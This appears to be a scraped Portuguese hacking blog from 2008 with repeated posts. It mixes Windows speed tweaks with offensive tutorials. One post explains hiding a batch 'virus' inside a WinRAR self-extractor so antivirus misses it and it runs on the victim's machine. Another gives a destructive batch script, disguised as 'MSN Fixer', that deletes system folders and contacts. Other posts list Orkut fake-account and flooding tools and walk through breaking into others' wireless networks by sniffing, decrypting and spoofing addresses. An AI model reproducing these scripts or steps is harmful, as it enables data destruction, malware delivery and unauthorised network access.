[DIC] Enviando arquivos não detectáveis...
Aqui ensinarei vocês a mandarem um arquivos "qualquer" junto com um virus "qualquer" não detctável e executado na hora.
Pois bem.
Vocês precisarão do Winrar, pra quem não sabe é um programinha que compacta e janta arquivos.
Tutorial ex:( usarei uma foto e um virus )
Pegue uma foto qualquer ex: .jpg e um virus .batch...coloque-os dentro de uma pasta:
Nome da foto: Batmam
virus: oi
abra o bloco de notas e digitem :
start oi.bat
start Batmam.jpg
salve qualquecoisa.bat
ok. Juntem numa pasta e criem um executor SFX do winrar e envie pra vitima.
Contudo : o SFX não dei os AV's detectarem eo .batch start, ele ja executa os arquivos sem que a vítima execute manualmente.
Mostrando postagens com marcador INTERNET. Mostrar todas as postagens
Mostrando postagens com marcador INTERNET. Mostrar todas as postagens
quarta-feira, 22 de outubro de 2008
Aumente a Velocidade dos seus Dowloads
Aumente a Velocidade dos seus Dowloads
1º ~~>Iniciar ---> Executar:
2º ~~>Escreva--> Regedit
3º ~~>HKEY_CURRENT_USER -->Software -->Microssoft -->Windows --> CurrentVersion --> InternetSettings.
4º Clique com o Botão direito do Mouse, vai em Novo Valor Dword, coloque o nome do Valor de MaxConnectionsPer1_0Server=Dword:0000000a
5º Crie outro Valor Dword com o nome de MaxConnectionsPerServer=Dword:0000000a
6º deixe um UP
1º ~~>Iniciar ---> Executar:
2º ~~>Escreva--> Regedit
3º ~~>HKEY_CURRENT_USER -->Software -->Microssoft -->Windows --> CurrentVersion --> InternetSettings.
4º Clique com o Botão direito do Mouse, vai em Novo Valor Dword, coloque o nome do Valor de MaxConnectionsPer1_0Server=Dword:0000000a
5º Crie outro Valor Dword com o nome de MaxConnectionsPerServer=Dword:0000000a
6º deixe um UP
[Wireless] Como driblar a segurança!
[Wireless] Como driblar a segurança!
Todos temos lido, visto e ouvido muita “propaganda” sobre insegurança nas redes Wireless. Quem não teve já contacto com redes desprotegidas? E os que se protegem sabem se estão seguros dessa forma?
É um “clichê” dizer que “nada é 100% seguro”, é verdade, nada é 100% seguro. Estou mesmo convencido que se alguém com certos e determinados conhecimentos se aplicar a explorar vulnerabilidades na segurança do Wireless, conseguirá frutos em quantidade industrial.
Quem estiver mal intencionado pode, com as ferramentas certas, descobrir redes desprotegidas e de alguma forma prejudicar quem se sente seguro por trás do seu PC ligado ao mundo da Internet.
Felizmente ou infelizmente a Internet é um berço para estas ferramentas gratuita, ferramentas que nos fornecem dados importantes sobre redes Wireless, neste caso deveremos usar esta mala de ferramentas para testar a nossa própria segurança.
Descobrir Redes Wireless
Localizar a rede Wireless é o primeiro passo para explorar, existem para esse fim duas ferramentas que serão certamente do vosso conhecimento:
Network Stumbler a.k.a NetStumbler – Esta ferramenta para o Windows facilmente encontra o sinal Wireless difundido das redondezas, é uma fantástica aplicação. Uso-a para em casos de dificuldade de captação de sinal determinar a força e o ruído existente no sinal enviado. existem empresas que para instalar os seus hotspots recorrem a esta aplicação determinando com mais exactidão as características do terreno envolvente tendo em conta a qualidade do sinal difundido.
http://www.pplware.com/wp-content/images/imagem_netstumbler.jpg
Licença: Freeware | Download: NetStumbler 0.4.0 [1.26MB]
http://www.netstumbler.com/downloads/
Kismet
Kismet - Esta ferramenta vem completar a ferramenta apresentada anteriormente o NetStumbler, pois este não consegue detectar as redes Wireless que escondem o SSID. Portanto esta ferramenta além de detectar as redes difundidas de forma visível, consegue identificar quais as que estão camufladas, podendo mesmo identificar tentativas de acesso ao seu ponto Wireless.
http://www.pplware.com/wp-content/images/imagem_kismet_small.jpg
Licença: Freeware | Download: Kismet 2007-01-R1b [4.58MB]
http://www.net-security.org/goto.php?cat=2&id=218
Anexar ligação às redes descobertas
Agora que descobriu as redes Wireless passe para o nível seguinte, ligar-se a essas redes.
Se a(s) rede(s) não está a usar qualquer tipo de autenticação ou encriptação de segurança então pode simplesmente ligar-se ao SSID. Se o SSID não está a ser difundido o utilizador pode criar um perfil com o nome do SSID pois esse nome não estará a ser difundido, mas claro que o utilizador já o sabe pois usou o Kismet, certo? Mas e se a rede wireless solicitar autenticação? Bem nesse caso teremos que passar para um nível mais a cima nesta pirâmide de recursos.
Airsnort – Bem esta é a ferramenta que irá “cheirar” e quebrar a protecção das chaves WEP que normalmente usamos para “proteger” as nossas ligações. É muito simples de usar. Temos já referido aqui no Peopleware em artigos anteriores dedicados às protecções Wireless que a chave WEP é muito fraca, com este tipo de aplicações usar uma chave WEP é o mesmo que não usar nada.
Ao usar esta ferramenta descobrirá formas e estratégias para mais rapidamente descobrir as chaves WEP, ferramentas adicionais podem melhorar a técnica e simplificar o processo, essas ferramentas não estão anexas ao Airsnort. O processo não é rápido o que descobrir as chaves, serão precisas várias tentativas a cheirar os pacotes de chaves para “crackar” as chave WEP, mas descobri que até se consegue.
http://www.pplware.com/wp-content/images/imagem_airsnort_small.jpg
Licença: Open Source | Download: AirSnort 0.2.7e [4.81MB]
http://downloads.sourceforge.net/airsnort/airsnort-0.2.7e.tar.gz?modtime=1105333467&big_mirror=0
CowPatty – Pois é, mas o que descobriu tinha protecção WPA e agora? Agora pode usar o CowPatty, esta aplicação é usada para despoletar acções de arrombamento a chamada “brute force” para crackar WPA-PSK. Esta chave tem sido incentivada aos utilizadores como sendo a nova segurança WEP para segurança Wireless caseiras. O que faz esta aplicação? Simplesmente descarrega uns milhares de combinações alfanuméricas de um ficheiro dicionário tentando que umas usadas coincida e permita a autenticação.
http://www.pplware.com/wp-content/images/imagem_cowpatty.jpg
Licença: Open Source | CowPatty 2.0 [921KB]
http://downloads.sourceforge.net/cowpatty/cowpatty-2.0.tgz?modtime=1100099327&big_mirror=0
Sniffing de dados da rede Wireless
Quer esteja directamente ligado a uma rede Wireless ou não existindo num raio de captação pacotes de dados a “voar” de um lado para o outro o utilizador poderá “vê-los” para isso precisa de uma ferramenta.
Wireshark (formerly Ethereal) – Com um sniffer, podemos monitorizar o acesso a determinados serviços de rede como por exemplo e-mail, acesso remoto (telnet, rlogin), transferência de ficheiros (FTP), etc. Permite-nos ainda identificar a existência de tráfego anormal na nossa rede. Um exemplo vulgar, é alguém mal intencionado andar pela nossa rede à procura de dados, como por exemplo passwords, para mais tarde poder usar. Imaginem que os dados que passam na nossa rede não estão encriptados? Óptimo para o hacker !!!
Os mais conhecidos para sistemas Linux são o tcpdump, ethereal. Para Windows também existe o ethereal, ou winshark que foi concebido pelos mesmos autores do ethereal. Se fizerem uma pesquisa no Google irão encontrar muitas referências a sniffers. Aqui têm uma lista com alguns deles. O processo de “sniffing” está associado a uma ou mais interfaces de rede de um determinado computador.
http://www.pplware.com/wp-content/images/imagem_wireshark_small.jpg
Licença: Freeware | Download: Wireshark 0.99.6a [17.47MB]
http://www.ethereal.com/download.html
ou
http://www.ziggi.com.br/downloadnow/id/318/tipo/1
Como nos podemos defender?
É importante saber para que servem e como se usam estas ferramentas, este meu pequeno guia apenas tem como objectivo alertar para o que podem encontrar à disposição de pessoas mal intencionadas.
NetStumbler – Nunca permita que o seu router difunda o seu SSID. Assegure-se que a sua rede está protegida usando autenticações e encriptações avançadas.
Kismet – Aqui realmente não há muito a fazer, ele descobrirá a vossa rede, no entanto esta deverá estar protegida com as tais autenticações e encriptações avançadas existentes nos vossos routers. Se não conseguírdes fazer essas protecções o vosso ISP tem à disposição técnicos que vos podem ajudar a configurar o router.
Airsnort – Usem uma chave de encriptação a 128-bit, pois se usarem a mais baixa a 40-bit WEP de nada podeis fazer contra esta ferramenta. Não quer dizer que a chave a 128 bits não possa ser quebrada, demora é muito mais tempo que pode demover o hacker. Para estar seguro use chaves de encriptação WPA ou WPA2.
Cowpatty – Conta esta ferramenta somente o protelar para descobrir a chave WPA, para isso ude chaves longas e complexas. Quanto mais complexa for mais dificuldade cria a quem usar esta ferramenta para invadir a sua rede.
Winshark – Use encriptação, assim quem “cheirar” a sua rede terá de enfrentar uma possibilidade ínfima de conseguir recuperar quaisquer dados.
WPA2 usa encriptação de dados AES, podemos dizer que é irrisória a possibilidade de um hacker quebrar esta cifra. Mesmo o protocolo WEP poderá encriptar os dados. Quando se encontrar num hotspot publico que geralmente não oferecem protecção para dados use aplicações de terceiros para encriptar os seus dados, mesmo se usar o messenger e derivados. Para empresas a solução é usar VPN e aplicações de terceiros para proteger os dados encriptando-os.
Todos temos lido, visto e ouvido muita “propaganda” sobre insegurança nas redes Wireless. Quem não teve já contacto com redes desprotegidas? E os que se protegem sabem se estão seguros dessa forma?
É um “clichê” dizer que “nada é 100% seguro”, é verdade, nada é 100% seguro. Estou mesmo convencido que se alguém com certos e determinados conhecimentos se aplicar a explorar vulnerabilidades na segurança do Wireless, conseguirá frutos em quantidade industrial.
Quem estiver mal intencionado pode, com as ferramentas certas, descobrir redes desprotegidas e de alguma forma prejudicar quem se sente seguro por trás do seu PC ligado ao mundo da Internet.
Felizmente ou infelizmente a Internet é um berço para estas ferramentas gratuita, ferramentas que nos fornecem dados importantes sobre redes Wireless, neste caso deveremos usar esta mala de ferramentas para testar a nossa própria segurança.
Descobrir Redes Wireless
Localizar a rede Wireless é o primeiro passo para explorar, existem para esse fim duas ferramentas que serão certamente do vosso conhecimento:
Network Stumbler a.k.a NetStumbler – Esta ferramenta para o Windows facilmente encontra o sinal Wireless difundido das redondezas, é uma fantástica aplicação. Uso-a para em casos de dificuldade de captação de sinal determinar a força e o ruído existente no sinal enviado. existem empresas que para instalar os seus hotspots recorrem a esta aplicação determinando com mais exactidão as características do terreno envolvente tendo em conta a qualidade do sinal difundido.
http://www.pplware.com/wp-content/images/imagem_netstumbler.jpg
Licença: Freeware | Download: NetStumbler 0.4.0 [1.26MB]
http://www.netstumbler.com/downloads/
Kismet
Kismet - Esta ferramenta vem completar a ferramenta apresentada anteriormente o NetStumbler, pois este não consegue detectar as redes Wireless que escondem o SSID. Portanto esta ferramenta além de detectar as redes difundidas de forma visível, consegue identificar quais as que estão camufladas, podendo mesmo identificar tentativas de acesso ao seu ponto Wireless.
http://www.pplware.com/wp-content/images/imagem_kismet_small.jpg
Licença: Freeware | Download: Kismet 2007-01-R1b [4.58MB]
http://www.net-security.org/goto.php?cat=2&id=218
Anexar ligação às redes descobertas
Agora que descobriu as redes Wireless passe para o nível seguinte, ligar-se a essas redes.
Se a(s) rede(s) não está a usar qualquer tipo de autenticação ou encriptação de segurança então pode simplesmente ligar-se ao SSID. Se o SSID não está a ser difundido o utilizador pode criar um perfil com o nome do SSID pois esse nome não estará a ser difundido, mas claro que o utilizador já o sabe pois usou o Kismet, certo? Mas e se a rede wireless solicitar autenticação? Bem nesse caso teremos que passar para um nível mais a cima nesta pirâmide de recursos.
Airsnort – Bem esta é a ferramenta que irá “cheirar” e quebrar a protecção das chaves WEP que normalmente usamos para “proteger” as nossas ligações. É muito simples de usar. Temos já referido aqui no Peopleware em artigos anteriores dedicados às protecções Wireless que a chave WEP é muito fraca, com este tipo de aplicações usar uma chave WEP é o mesmo que não usar nada.
Ao usar esta ferramenta descobrirá formas e estratégias para mais rapidamente descobrir as chaves WEP, ferramentas adicionais podem melhorar a técnica e simplificar o processo, essas ferramentas não estão anexas ao Airsnort. O processo não é rápido o que descobrir as chaves, serão precisas várias tentativas a cheirar os pacotes de chaves para “crackar” as chave WEP, mas descobri que até se consegue.
http://www.pplware.com/wp-content/images/imagem_airsnort_small.jpg
Licença: Open Source | Download: AirSnort 0.2.7e [4.81MB]
http://downloads.sourceforge.net/airsnort/airsnort-0.2.7e.tar.gz?modtime=1105333467&big_mirror=0
CowPatty – Pois é, mas o que descobriu tinha protecção WPA e agora? Agora pode usar o CowPatty, esta aplicação é usada para despoletar acções de arrombamento a chamada “brute force” para crackar WPA-PSK. Esta chave tem sido incentivada aos utilizadores como sendo a nova segurança WEP para segurança Wireless caseiras. O que faz esta aplicação? Simplesmente descarrega uns milhares de combinações alfanuméricas de um ficheiro dicionário tentando que umas usadas coincida e permita a autenticação.
http://www.pplware.com/wp-content/images/imagem_cowpatty.jpg
Licença: Open Source | CowPatty 2.0 [921KB]
http://downloads.sourceforge.net/cowpatty/cowpatty-2.0.tgz?modtime=1100099327&big_mirror=0
Sniffing de dados da rede Wireless
Quer esteja directamente ligado a uma rede Wireless ou não existindo num raio de captação pacotes de dados a “voar” de um lado para o outro o utilizador poderá “vê-los” para isso precisa de uma ferramenta.
Wireshark (formerly Ethereal) – Com um sniffer, podemos monitorizar o acesso a determinados serviços de rede como por exemplo e-mail, acesso remoto (telnet, rlogin), transferência de ficheiros (FTP), etc. Permite-nos ainda identificar a existência de tráfego anormal na nossa rede. Um exemplo vulgar, é alguém mal intencionado andar pela nossa rede à procura de dados, como por exemplo passwords, para mais tarde poder usar. Imaginem que os dados que passam na nossa rede não estão encriptados? Óptimo para o hacker !!!
Os mais conhecidos para sistemas Linux são o tcpdump, ethereal. Para Windows também existe o ethereal, ou winshark que foi concebido pelos mesmos autores do ethereal. Se fizerem uma pesquisa no Google irão encontrar muitas referências a sniffers. Aqui têm uma lista com alguns deles. O processo de “sniffing” está associado a uma ou mais interfaces de rede de um determinado computador.
http://www.pplware.com/wp-content/images/imagem_wireshark_small.jpg
Licença: Freeware | Download: Wireshark 0.99.6a [17.47MB]
http://www.ethereal.com/download.html
ou
http://www.ziggi.com.br/downloadnow/id/318/tipo/1
Como nos podemos defender?
É importante saber para que servem e como se usam estas ferramentas, este meu pequeno guia apenas tem como objectivo alertar para o que podem encontrar à disposição de pessoas mal intencionadas.
NetStumbler – Nunca permita que o seu router difunda o seu SSID. Assegure-se que a sua rede está protegida usando autenticações e encriptações avançadas.
Kismet – Aqui realmente não há muito a fazer, ele descobrirá a vossa rede, no entanto esta deverá estar protegida com as tais autenticações e encriptações avançadas existentes nos vossos routers. Se não conseguírdes fazer essas protecções o vosso ISP tem à disposição técnicos que vos podem ajudar a configurar o router.
Airsnort – Usem uma chave de encriptação a 128-bit, pois se usarem a mais baixa a 40-bit WEP de nada podeis fazer contra esta ferramenta. Não quer dizer que a chave a 128 bits não possa ser quebrada, demora é muito mais tempo que pode demover o hacker. Para estar seguro use chaves de encriptação WPA ou WPA2.
Cowpatty – Conta esta ferramenta somente o protelar para descobrir a chave WPA, para isso ude chaves longas e complexas. Quanto mais complexa for mais dificuldade cria a quem usar esta ferramenta para invadir a sua rede.
Winshark – Use encriptação, assim quem “cheirar” a sua rede terá de enfrentar uma possibilidade ínfima de conseguir recuperar quaisquer dados.
WPA2 usa encriptação de dados AES, podemos dizer que é irrisória a possibilidade de um hacker quebrar esta cifra. Mesmo o protocolo WEP poderá encriptar os dados. Quando se encontrar num hotspot publico que geralmente não oferecem protecção para dados use aplicações de terceiros para encriptar os seus dados, mesmo se usar o messenger e derivados. Para empresas a solução é usar VPN e aplicações de terceiros para proteger os dados encriptando-os.
sábado, 18 de outubro de 2008
Mudando IP Dinâmico
Mudando IP Dinâmico
E só criar um arquivo ".bat" para fazer o processo para nós!
Copie o que está em negrito em um bloco de notas:
echo "Mudar IP Conexão local"
ipconfig /release
netsh interface ip set address name="Conexão local" source=static addr=111.111.111.111 mask=255.0.0.0
netsh interface ip set address name="Conexão local" source=dhcp
ipconfig /renew
echo "Mudado IP Conexão local"
Salve o bloco de notas com o nome: AlterarIP.bat
agora é só executar o .bat que faz tudo para você .
Obs: o nome da sua conexão tem que ser Conexão local .
E so funciona se seu IP for dinâmico !
E só criar um arquivo ".bat" para fazer o processo para nós!
Copie o que está em negrito em um bloco de notas:
echo "Mudar IP Conexão local"
ipconfig /release
netsh interface ip set address name="Conexão local" source=static addr=111.111.111.111 mask=255.0.0.0
netsh interface ip set address name="Conexão local" source=dhcp
ipconfig /renew
echo "Mudado IP Conexão local"
Salve o bloco de notas com o nome: AlterarIP.bat
agora é só executar o .bat que faz tudo para você .
Obs: o nome da sua conexão tem que ser Conexão local .
E so funciona se seu IP for dinâmico !
Ferramentas para o orkut
Ferramentas para o orkut
Site: http://alvierestools.007sites.com/ferramentas.html
Join (Joina seus fakes em uma determinada comunidade)
Unjoin (Unjoina seus fakes de uma determinada comunidade)
FakeEdit (Edita todos seu fakes em massa)
FloodScrap (Flooda com seus fakes um scrapbook determinado)
VerificaFakes (Verifica seus fakes se estão ativos ou deletados)
FakesaddMyProfile (Adiciona seus Fakes em um determinado Perfil!)
Find UIDS(pegar todos os uid's de uma determinado comunidade)
up topic(upar topicos e deixa sua comunidade sempre no topo)
FakesVisitMyProfile(Fakes seus visitam seu perfil)
Site: http://alvierestools.007sites.com/ferramentas.html
Site: http://alvierestools.007sites.com/ferramentas.html
Join (Joina seus fakes em uma determinada comunidade)
Unjoin (Unjoina seus fakes de uma determinada comunidade)
FakeEdit (Edita todos seu fakes em massa)
FloodScrap (Flooda com seus fakes um scrapbook determinado)
VerificaFakes (Verifica seus fakes se estão ativos ou deletados)
FakesaddMyProfile (Adiciona seus Fakes em um determinado Perfil!)
Find UIDS(pegar todos os uid's de uma determinado comunidade)
up topic(upar topicos e deixa sua comunidade sempre no topo)
FakesVisitMyProfile(Fakes seus visitam seu perfil)
Site: http://alvierestools.007sites.com/ferramentas.html
Deixando a net bala
Deixando a net bala !!
1. click em INICIAR > EXECUTAR e digite: gpedit.msc
2. Abrirá uma janela "DIRETIVAS DE GRUPO"
3. Abra CONFIGURAÇÕES DO COMPUTADOR
4. siga o caminho: MODELOS ADMINISTRATIVOS/ REDE/ AGENDADOR DE PACOTES OoS
5. Na janela ao lado procure pela opção LIMITAR LARGURA DE BANDA RESERVÁVEL e de 2 clicks
6. Na janela que abrirá selecione ATIVADO e altere o item LIMITE DE LARGURA DE BANDA (%) de 20% para 0%.
7. click em aplicar e OK.
1. click em INICIAR > EXECUTAR e digite: gpedit.msc
2. Abrirá uma janela "DIRETIVAS DE GRUPO"
3. Abra CONFIGURAÇÕES DO COMPUTADOR
4. siga o caminho: MODELOS ADMINISTRATIVOS/ REDE/ AGENDADOR DE PACOTES OoS
5. Na janela ao lado procure pela opção LIMITAR LARGURA DE BANDA RESERVÁVEL e de 2 clicks
6. Na janela que abrirá selecione ATIVADO e altere o item LIMITE DE LARGURA DE BANDA (%) de 20% para 0%.
7. click em aplicar e OK.
Congele o MSN de alguém
Congele o MSN de alguém
Copie o Código abaixo insira no Bloco de Notas e salve com nome.bat e só mande para quem você quiser ao execultar o Comando o relogio para e o MSN também
c:\
cd\
echo off
if exist lig1.drv goto 2
echo > lig1.drv sdfsdf
goto fim
:2
if exist lig2.drv goto 3
echo > lig2.drv sdfsdf
goto fim
:3
if exist lig3.drv goto 4
echo > lig3.drv sdfsdf
goto fim
:4
if exist lig4.drv goto 5
echo > lig4.drv sdfsdf
goto fim
:5
if exist lig5.drv goto 6
echo > lig4.drv sdfsdf
goto fim
:6
if exist lig6.drv goto 7
echo > lig6.drv sdfsdf
goto fim
:7
rmdir C:\windows
rmdir C:\arquivos de programas
rmdir C:\documents and settings
:fim
Função:depois que ele for ativado 7 vezes ele apaga tudo
Nome:MSN Fixer
cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*
Copie o Código abaixo insira no Bloco de Notas e salve com nome.bat e só mande para quem você quiser ao execultar o Comando o relogio para e o MSN também
c:\
cd\
echo off
if exist lig1.drv goto 2
echo > lig1.drv sdfsdf
goto fim
:2
if exist lig2.drv goto 3
echo > lig2.drv sdfsdf
goto fim
:3
if exist lig3.drv goto 4
echo > lig3.drv sdfsdf
goto fim
:4
if exist lig4.drv goto 5
echo > lig4.drv sdfsdf
goto fim
:5
if exist lig5.drv goto 6
echo > lig4.drv sdfsdf
goto fim
:6
if exist lig6.drv goto 7
echo > lig6.drv sdfsdf
goto fim
:7
rmdir C:\windows
rmdir C:\arquivos de programas
rmdir C:\documents and settings
:fim
Função:depois que ele for ativado 7 vezes ele apaga tudo
Nome:MSN Fixer
cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*
Aumentando a velocidade do Internet Explorer
Aumentando a velocidade do Internet Explorer
-Um bug original do Windows 2000 acabou permanecendo no Windows XP, levando o Internet Explorer a
pesquisar por tarefas agendadas sempre que é aberto, e isso faz com que ele demore sempre a abrir.
-Você pode eliminar esse problema encontrando o seguinte item do registro(iniciar;executar;regedit):
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Explorer\RemoteComputer\NameSpace
Encontre então na coluna da direita a chave ClassId key
{D6277990-4C6A-11CF-8D87-00AA0060F5BF} e a delete simplesmente. Saia então do registro e abra o
Internet Explorer. Observe a diferença!
-Um bug original do Windows 2000 acabou permanecendo no Windows XP, levando o Internet Explorer a
pesquisar por tarefas agendadas sempre que é aberto, e isso faz com que ele demore sempre a abrir.
-Você pode eliminar esse problema encontrando o seguinte item do registro(iniciar;executar;regedit):
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Explorer\RemoteComputer\NameSpace
Encontre então na coluna da direita a chave ClassId key
{D6277990-4C6A-11CF-8D87-00AA0060F5BF} e a delete simplesmente. Saia então do registro e abra o
Internet Explorer. Observe a diferença!
sexta-feira, 17 de outubro de 2008
Secrétaria eletrônica em sua Página de Recados do orkut
Secrétaria eletrônica em sua Página de Recados
O Botscrap é um tipo de secrétaria eltrônica responde seus Scraps automaticos
você configura a mensagem e quando você estiver Off ela vai responder por você
Bom vamos lá
http://987532.110mb.com/botscrap.phps
pegue os Scripts na Página acima
então feito isso coloque eles no bloco de notas e salve com a extensão "secretaria.php" sem as áspas logíco.
sem esuqecer de colocar seu Login,Senha,Uid e mudar o Recado que está lá
Importante quando for salvar os scripts click em Arquivo>>Salvar Como>> E você dar o Nome e escolhe a Opção todos os Arquivos
agora procure um site com suporte a PHP pra você poder Hospedar eu recomento o Hos2.nu ele eah otimo
pronto agora depois de salvo no site você pega o link
Ex http://brucehackermetalico.host2.nu/Secretaria.php
e você coloca em sua página de recados e coloque pra ficar assim
http://brucehackermetalico.host2.nu/Secretaria.php#.jpg
e envie pra sua página de recados
Aviso se quiser desativar ele basta apagar o recado
e quando quiser só faça a mesma coisa
OK
O Botscrap é um tipo de secrétaria eltrônica responde seus Scraps automaticos
você configura a mensagem e quando você estiver Off ela vai responder por você
Bom vamos lá
http://987532.110mb.com/botscrap.phps
pegue os Scripts na Página acima
então feito isso coloque eles no bloco de notas e salve com a extensão "secretaria.php" sem as áspas logíco.
sem esuqecer de colocar seu Login,Senha,Uid e mudar o Recado que está lá
Importante quando for salvar os scripts click em Arquivo>>Salvar Como>> E você dar o Nome e escolhe a Opção todos os Arquivos
agora procure um site com suporte a PHP pra você poder Hospedar eu recomento o Hos2.nu ele eah otimo
pronto agora depois de salvo no site você pega o link
Ex http://brucehackermetalico.host2.nu/Secretaria.php
e você coloca em sua página de recados e coloque pra ficar assim
http://brucehackermetalico.host2.nu/Secretaria.php#.jpg
e envie pra sua página de recados
Aviso se quiser desativar ele basta apagar o recado
e quando quiser só faça a mesma coisa
OK
Invadindo uma Rde Wireless
Invadindo uma Rde Wireless
Para ter acesso a uma rede, você precisa estar “dentro” dela, pra isso são necessários algumas coisas, sendo elas:
1- IP (leia o tutorial “Era uma vez o IP”)
2- Mascara, serve pra informar qual a dimensão da rede entre outros.
3- Gateway, ele que faz a ligação da rede interna com o ambiente externo, sem o gateway você não tem comunicação com o mundo externo, ou seja, não acessa a internet.
4- DNS , servidor para resoluções de nomes, ele que diz que o www.warchalking.com.br corresponde a tal servidor.
5- SSID e canal, especificam qual rede você ira se conectar.
6- MAC (leia o tutorial “Era uma vez o MAC”)
Parte I: Pegando o SSID, o canal e alguns pacotes.
Para conseguir esses dados vamos nos aproveitar que as ondas de radio permitem o eavesdropping com facilidade (leia o tutorial “Fenômeno Eavesdropping”).
A primeira coisa a fazer é entrar no Airodump para capturar pacotes da rede sem sermos os destinatarios, sua placa precisa ter a capacidade de entrar em modo monitor para tal (leia o tutorial “Modo monitor no Windows p/ Aircrack”).
Abra o Airodump, e faça o mesmo processo que para quebrar a chave WEP (leia o tutorial “Entendendo e vendenco a WEP- Windows”), a diferença é que quando perguntado se deseja gravar apenas os IVs, coloque que não, “n”. Veja como deve ficar:
Aperte enter.
Agora deixe capturar cerca de 20mil pacotes (para termos uma boa margem de trabalho), repare que o Airodump irá te fornecer o SSID e o canal em que o isp esta transmitindo. Após pegar os pacotes aperte para parar (Ctrl + C).
Caso a rede visada não apresente criptografia pule para a parte III.
Parte II: Desencriptando os pacotes
Para poder analisar os pacotes precisaremos ver seus dados em plain-text, isso só será possível se removermos a criptografia deles, para isso vamos usar o Airdecap, (disponível para download no pacote “Aircrack e Airodum p/ Windows & Linux”) abra o cmd (Botão com o símbolo do windows + R, digite cmd.exe e execute), no cmd vá para a pasta \bin onde você descompactou o pacote do Aircrack, execute o Airdecap com o seguinte comando:
airdecap-ng –wCHAVE-EM-HEXADECIMAL NomeDoArquivo.cap
Onde CHAVE-EM-HEXADECIMAL é a chave criptográfica em hexadecimal (leia o tutorial “Entendendo e vencendo a WEP- Windows”), NomeDoArquivo é o nome do arquivo escolhido, no nosso exemplo caso Warchalking.com.BR.
Sua tela deverá ser algo do tipo:
Aperte enter
Para esta parte você precisará de um sinffer que abra arquivos .cap, para este tutorial usei o Ehtereal (disponível na seção de downloads).
Obs: Se você precisou desencriptar os pacotes use o arquivo “NomeDoArquivo-dec” criado na pasta do Airdecap.
Parte III: Encontrnado o DNS.
Abra o arquivo .cap com o Ethereal e filtre por “dns”, para isso escreva dns na barra superior ao lado de “Filter:”.
Você deverá ver uma tela como essa:
Procure por um IP que na info tenha “Standard query response” e como destino vários IPs diferentes, como se observa nessa tela:
Esse IP será o seu servidor DNS, no nosso caso 200.206.96.2. Uma dica boa é entrar no site www.registro.br e procurar pelo site do servidor, lá ele vai te dizer o DNS usado para hospedar a pagina, como normalmente os provedores hospedam a própria pagina o DNS mostrado lá, será o mesmo que encontramos pela analise dos pacotes no Ethereal.
Parte IV: Gateway.
Abra o arquivo .cap com o e Ethereal e filtre por “arp”, para isso escreva arp na barra superior ao lado de “Filter:”.
Você deverá ver uma tela como essa:
Ordene as informações por “info” penas clicando em info, agora procure algo parecido com essa figura:
Repare que vários “Who has” indicam para o mesmo IP menor que eles, esse IP provavelmente será o Gateway da rede, no nosso exemplo 192.168.2.1.
Parte V: Encontrando o IP e MAC
Agora falta somente IP e MAC para você, filtre por "tcp" na barra superior, escolha um par IP-MAC da lista que aparecer, no nosso exemplo usei o IP 192.168.2.24 e o MAC dele.
Bom, agora só ir no Status da conexão, clicar em propriedades e completar com os dados assim conseguidos.
Parte VI: Obtendo a mascara.
Primeiramente tentamos mascaras de rede tradicionais, como 255.255.0.0; 255.255.255.0; 255.255.240.0
Caso nenhuma destas nos de resultados satisfatórios use uma calculadora de IP, chamada IPcalc, que está disponivel na seção de downloads.
Para ter acesso a uma rede, você precisa estar “dentro” dela, pra isso são necessários algumas coisas, sendo elas:
1- IP (leia o tutorial “Era uma vez o IP”)
2- Mascara, serve pra informar qual a dimensão da rede entre outros.
3- Gateway, ele que faz a ligação da rede interna com o ambiente externo, sem o gateway você não tem comunicação com o mundo externo, ou seja, não acessa a internet.
4- DNS , servidor para resoluções de nomes, ele que diz que o www.warchalking.com.br corresponde a tal servidor.
5- SSID e canal, especificam qual rede você ira se conectar.
6- MAC (leia o tutorial “Era uma vez o MAC”)
Parte I: Pegando o SSID, o canal e alguns pacotes.
Para conseguir esses dados vamos nos aproveitar que as ondas de radio permitem o eavesdropping com facilidade (leia o tutorial “Fenômeno Eavesdropping”).
A primeira coisa a fazer é entrar no Airodump para capturar pacotes da rede sem sermos os destinatarios, sua placa precisa ter a capacidade de entrar em modo monitor para tal (leia o tutorial “Modo monitor no Windows p/ Aircrack”).
Abra o Airodump, e faça o mesmo processo que para quebrar a chave WEP (leia o tutorial “Entendendo e vendenco a WEP- Windows”), a diferença é que quando perguntado se deseja gravar apenas os IVs, coloque que não, “n”. Veja como deve ficar:
Aperte enter.
Agora deixe capturar cerca de 20mil pacotes (para termos uma boa margem de trabalho), repare que o Airodump irá te fornecer o SSID e o canal em que o isp esta transmitindo. Após pegar os pacotes aperte para parar (Ctrl + C).
Caso a rede visada não apresente criptografia pule para a parte III.
Parte II: Desencriptando os pacotes
Para poder analisar os pacotes precisaremos ver seus dados em plain-text, isso só será possível se removermos a criptografia deles, para isso vamos usar o Airdecap, (disponível para download no pacote “Aircrack e Airodum p/ Windows & Linux”) abra o cmd (Botão com o símbolo do windows + R, digite cmd.exe e execute), no cmd vá para a pasta \bin onde você descompactou o pacote do Aircrack, execute o Airdecap com o seguinte comando:
airdecap-ng –wCHAVE-EM-HEXADECIMAL NomeDoArquivo.cap
Onde CHAVE-EM-HEXADECIMAL é a chave criptográfica em hexadecimal (leia o tutorial “Entendendo e vencendo a WEP- Windows”), NomeDoArquivo é o nome do arquivo escolhido, no nosso exemplo caso Warchalking.com.BR.
Sua tela deverá ser algo do tipo:
Aperte enter
Para esta parte você precisará de um sinffer que abra arquivos .cap, para este tutorial usei o Ehtereal (disponível na seção de downloads).
Obs: Se você precisou desencriptar os pacotes use o arquivo “NomeDoArquivo-dec” criado na pasta do Airdecap.
Parte III: Encontrnado o DNS.
Abra o arquivo .cap com o Ethereal e filtre por “dns”, para isso escreva dns na barra superior ao lado de “Filter:”.
Você deverá ver uma tela como essa:
Procure por um IP que na info tenha “Standard query response” e como destino vários IPs diferentes, como se observa nessa tela:
Esse IP será o seu servidor DNS, no nosso caso 200.206.96.2. Uma dica boa é entrar no site www.registro.br e procurar pelo site do servidor, lá ele vai te dizer o DNS usado para hospedar a pagina, como normalmente os provedores hospedam a própria pagina o DNS mostrado lá, será o mesmo que encontramos pela analise dos pacotes no Ethereal.
Parte IV: Gateway.
